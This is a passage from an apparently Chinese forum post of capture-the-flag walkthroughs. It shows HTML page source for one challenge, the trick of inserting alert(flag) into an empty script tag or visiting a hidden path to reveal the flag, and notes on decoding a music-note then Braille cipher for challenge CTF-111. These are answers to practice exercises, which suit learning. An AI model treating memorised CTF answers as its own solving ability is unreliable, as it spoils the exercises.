class="tag">&lt;body&gt;</span></code></li><li class="L8"><code class="lang-html"><span class="tag">&lt;div</span><span class="pln"> </span><span class="atn">id</span><span class="pun">=</span><span class="atv">"timer"</span><span class="pln"> </span><span class="atn">style</span><span class="pun">=</span><span class="atv">"</span><span class="pln">color</span><span class="pun">:</span><span class="pln">red</span><span class="atv">"</span><span class="tag">&gt;&lt;/div&gt;</span></code></li><li class="L9"><code class="lang-html"><span class="tag">&lt;div</span><span class="pln"> </span><span class="atn">id</span><span class="pun">=</span><span class="atv">"warring"</span><span class="pln"> </span><span class="atn">style</span><span class="pun">=</span><span class="atv">"</span><span class="pln">color</span><span class="pun">:</span><span class="pln">red</span><span class="atv">"</span><span class="tag">&gt;&lt;/div&gt;</span></code></li><li class="L0"><code class="lang-html"></code></li><li class="L1"><code class="lang-html"><span class="tag">&lt;input</span><span class="pln"> </span><span class="atn">type</span><span class="pun">=</span><span class="atv">"button"</span><span class="pln"> </span><span class="atn">value</span><span class="pun">=</span><span class="atv">"赶快点我吧！"</span><span class="pln"> </span><span class="atn">onclick</span><span class="pun">=</span><span class="atv">"</span><span class="pln">CS</span><span class="pun">()</span><span class="atv">"</span><span class="tag">/&gt;</span></code></li><li class="L2"><code class="lang-html"><span class="tag">&lt;div</span><span class="pln"> </span><span class="atn">id</span><span class="pun">=</span><span class="atv">div</span><span class="tag">&gt;&lt;/div&gt;</span></code></li><li class="L3"><code class="lang-html"><span class="tag">&lt;/body&gt;</span></code></li><li class="L4"><code class="lang-html"><span class="tag">&lt;script&gt;&lt;/script&gt;</span></code></li><li class="L5"><code class="lang-html"><span class="tag">&lt;/html&gt;</span></code></li></ol></pre>
<p><strong>这道题相对简单，只需要查看源码</strong></p>
<p><strong>可以在</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="tag">&lt;script&gt;&lt;/script&gt;</span></code></li></ol></pre><p><strong>中间加上<code>alert(flag);</code><br>就可以弹出flag</strong></p>
<p><strong>也可以直接访问iuuiiuqiweuiqwueiqiuweuqwieuuniuqwehiuqwhieu即可获得flag</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">/</span><span class="pln">iuuiiuqiweuiqwueiqiuweuqwieuuniuqwehiuqwhieu</span></code></li></ol></pre><h2 id="h2-ctf-111"><a name="CTF-111" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-111</h2><p><strong>flag做了双重加密</strong></p>
<p><strong>音符加密-&gt;盲文加密</strong><br><strong>按顺序解密即可</strong><br><code>音符解密：https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=yinyue</code><br><code>盲文解密：https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=mangwen</code></p>
</div>
| 用户名 | 金币 | 积分 | 时间 | 理由 |
| 牛宝宝 |
4.00 |
0 |
2022-04-02 15:03:04 |
一个受益终生的帖子~~ |